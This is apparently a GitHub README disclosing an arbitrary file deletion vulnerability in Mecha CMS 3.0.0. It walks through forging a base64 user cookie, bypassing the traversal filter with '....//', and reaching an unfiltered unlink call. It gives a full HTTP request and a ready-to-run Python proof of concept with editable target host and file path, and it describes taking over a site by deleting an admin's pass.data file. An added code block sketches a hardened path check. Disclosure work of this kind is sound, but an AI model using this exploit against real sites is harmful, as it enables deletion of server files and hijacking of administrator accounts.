Sp1d3rL1/Mecha-cms-Arbitrary-File-Deletion-Vulnerability
Mecha-cms-Arbitrary-File-Deletion-Vulnerability

The arbitrary file deletion vulnerability is in ./lot/x/panel/index/panel/type/page/page.php (line 13). This file can be required by another file, which bypasses the CMS's check that the current user is legitimate, and the parameter $x is not properly filtered before the file it names is deleted, which leads to the vulnerability.

Information

Source code: https://github.com/mecha-cms/mecha/archive/refs/tags/v3.0.0.tar.gz → mecha-3.0.0.tar.gz

https://github.com/mecha-cms/x.panel/archive/refs/tags/v3.0.0.tar.gz → panel extension (x.panel v3.0.0) for Mecha 3.0.0

https://github.com/mecha-cms/x.user/archive/refs/tags/v2.0.0.tar.gz → user extension (x.user v2.0.0) for Mecha 3.0.0

Version: Mecha CMS 3.0.0

Summary: An attacker can craft a cookie that bypasses Mecha CMS's check that a user exists, and can craft a request URI that bypasses its check that the user is legitimate. The remaining parameters are then supplied in the POST body, resulting in the deletion of an arbitrary file.

Steps

Construct the HTTP request and its parameters as follows. The path in the request line, the POST body, and the cookie are all crafted (the full request is given in the Payload section below). [screenshot]

In ./lot/x/user/engine/plug/hook.php there is a check for the existence of the user: [screenshot]

To abuse the decoding logic of the cookie('user.name') function, set the cookie manually so that the function returns a path of your choosing:

[screenshot]

When Ii4uL3kvbG9nL2Fib3V0Ig== is set as the cookie value (it is the base64 encoding of the JSON string literal "../y/log/about"), the resulting path is "../y/log/about": [screenshot]

Because /var/www/html/mecha/lot/user/../y/log/about.page is a file that actually exists on disk, the existence check passes: [screenshot]

When execution reaches ./lot/x/panel/index.php, $user->exist is not empty: it holds the path supplied in the previous step.

Even though that path is not a user's .page file, execution still proceeds to panel.php. [screenshot]

By triggering the hook, execution reaches route.php: [screenshot]

In route.php, the 'path' value in $_ is concatenated in a loop into the variable $f, which is required once per iteration, so ./lot/x/panel/index/panel/route/../type/page/page.php ends up being required. [screenshot]

Mecha CMS does apply a filter against directory traversal, but it can be bypassed: [screenshot]

Use '....//' in 'path': the filter strips the inner '../' once, and what remains is '../'.

Ultimately, in page.php, with the POST parameters shown, the unlink function removes whatever file is named in $_POST['page']['x']: [screenshot]

I deleted del.abc from the web root directory to test the effectiveness of the exploit: [screenshot]

Deleted successfully.

Once a Mecha CMS username is known (admin is used as the example in the screenshot below), anyone can take over the site by deleting that user's authentication file, which is severe: [screenshot]

In the same way, pass.data is deleted as well.

[screenshot]
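The cookie forgery and the traversal-filter bypass from the steps above, as an added Python example that is not part of the original write-up or of Mecha CMS's code. It encodes an arbitrary path the way the page shows the cookie being decoded (base64 of a JSON string literal), models the CMS filter as a single pass that removes every '../' (an assumption inferred only from the observation that '....//' becomes '../'; the real filter may be implemented differently), and contrasts it with a resolve-then-check routine that rejects any path escaping a base directory no matter how the traversal is spelled. The base directory /srv/app/route is made up for illustration.

```python
import base64
import json
import posixpath


def forge_user_cookie(path: str) -> str:
    """Build a cookie value that decodes to `path`.

    The write-up's cookie Ii4uL3kvbG9nL2Fib3V0Ig== is the base64 encoding of
    the JSON string literal "../y/log/about"; this reproduces that encoding
    for any path.
    """
    return base64.b64encode(json.dumps(path).encode()).decode()


def decode_user_cookie(value: str) -> str:
    """Reverse of forge_user_cookie: the path the CMS would get back."""
    return json.loads(base64.b64decode(value).decode())


def single_pass_filter(path: str) -> str:
    """Assumed model of the traversal filter: one pass removing every '../'.

    Stripping the inner '../' out of '....//' leaves the surrounding two dots
    and one slash intact, so the output still contains '../'.
    """
    return path.replace("../", "")


def is_traversal_bypass(raw_path: str) -> bool:
    """True when the filtered path still contains a '../' component."""
    return "../" in single_pass_filter(raw_path)


def resolve_inside(base_dir: str, rel_path: str):
    """Hardened alternative: normalise the joined path, then check the prefix.

    Returns the resolved path, or None when it escapes base_dir. Because the
    check runs on the normalised result, spelling tricks such as '....//'
    cannot smuggle a '..' past it; '....' is just an ordinary directory name.
    """
    base = posixpath.normpath(base_dir)
    target = posixpath.normpath(posixpath.join(base, rel_path))
    if target == base or target.startswith(base + "/"):
        return target
    return None


if __name__ == "__main__":
    cookie = forge_user_cookie("../y/log/about")
    print("cookie value :", cookie)
    print("decoded      :", decode_user_cookie(cookie))
    route = "....//type/page/page"  # the traversal fragment from the payload path
    print("after filter :", single_pass_filter(route))
    print("bypass works :", is_traversal_bypass(route))
    # /srv/app/route is a made-up base directory for illustration
    print("hardened     :", resolve_inside("/srv/app/route", single_pass_filter(route)))
```

The same resolve_inside check, applied to page[x] against the pages directory before unlink is called, is what closes the deletion step: an absolute path such as /var/www/html/mecha/del.abc normalises to itself and fails the prefix test.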

Payload

HTTP Request:

POST http://192.168.0.155/mecha/panel/fire/boos/....//type/page/page HTTP/1.1
Host: 192.168.0.155
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
Origin: http://192.168.0.155
DNT: 1
Connection: close
Referer: http://192.168.0.155/mecha/panel/fire/boos/....//type/page/page
Cookie: PHPSESSID=u14i9od14jlv8puvef8grcpfhc; *3759209392=Ii4uL3kvbG9nL2Fib3V0Ig%3D%3D
Upgrade-Insecure-Requests: 1
Priority: u=0, i

data%5Bchunk%5D=0&page%5Bx%5D=%2Fvar%2Fwww%2Fhtml%2Fmecha%2Fdel.abc&page%5Bchunk%5D=1

Python3 PoC:

import requests

ip = "192.168.0.155"                     # change it: target host
delfile = "/var/www/html/mecha/del.abc"  # change it: absolute path of the file to delete

# Request path: '....//' survives the traversal filter as '../' and steers
# route.php into requiring type/page/page.php
url = "http://{}/mecha/panel/fire/boos/....//type/page/page".format(ip)
headers = {
    "Host": ip,
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded",
    "Origin": "http://{}".format(ip),
    "DNT": "1",
    "Connection": "close",
    "Referer": "http://{}/mecha/panel/fire/boos/....//type/page/page".format(ip),
    # Forged user cookie: base64 of the JSON string "../y/log/about",
    # which makes the user-existence check pass
    "Cookie": "PHPSESSID=u14i9od14jlv8puvef8grcpfhc; *3759209392=Ii4uL3kvbG9nL2Fib3V0Ig%3D%3D",
    "Upgrade-Insecure-Requests": "1",
    "Priority": "u=0, i"
}

data = {
    "data[chunk]": "0",
    "page[x]": delfile,   # passed unfiltered to unlink() in page.php
    "page[chunk]": "1"
}

# Send the POST request
response = requests.post(url, headers=headers, data=data)

# The status code may be 405, but the file is still deleted
# (the web server process must have permission to delete it)
print(response.status_code)
